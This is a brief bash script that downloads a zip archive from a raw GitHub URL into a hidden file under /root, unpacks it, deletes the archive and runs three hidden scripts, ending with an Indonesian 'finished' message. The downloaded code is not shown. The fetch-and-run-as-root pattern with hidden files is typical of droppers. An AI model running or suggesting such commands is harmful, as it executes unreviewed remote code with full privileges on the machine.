#!/bin/bash
REPO="https://raw.githubusercontent.com/YaddyKakkoii/tes/main/"

cd /root && wget -O /root/.sodok.zip "${REPO}sodok.zip"

unzip .sodok.zip
rm .sodok.zip > /dev/null 2>&1

bash .gg
bash .nul
bash .tt

echo "selesai maszeeh"
